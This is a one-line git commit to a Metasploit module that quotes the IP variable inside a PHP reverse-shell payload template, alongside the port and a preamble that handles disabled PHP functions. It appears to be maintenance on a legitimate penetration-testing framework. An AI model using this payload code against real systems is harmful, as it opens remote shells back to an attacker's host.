quoting ip to avoid php complaining

unstable
jvazquez-r7 2012-06-25 18:52:26 +02:00
parent 4afc6d698d
commit 59bb9ac23b
1 changed files with 1 additions and 1 deletions

View File

@ -69,7 +69,7 @@ module Metasploit3
end end
shell=<<-END_OF_PHP_CODE shell=<<-END_OF_PHP_CODE
$ipaddr=#{ipaddr}; $ipaddr='#{ipaddr}';
$port=#{port}; $port=#{port};
#{php_preamble({:disabled_varname => "$dis"})} #{php_preamble({:disabled_varname => "$dis"})}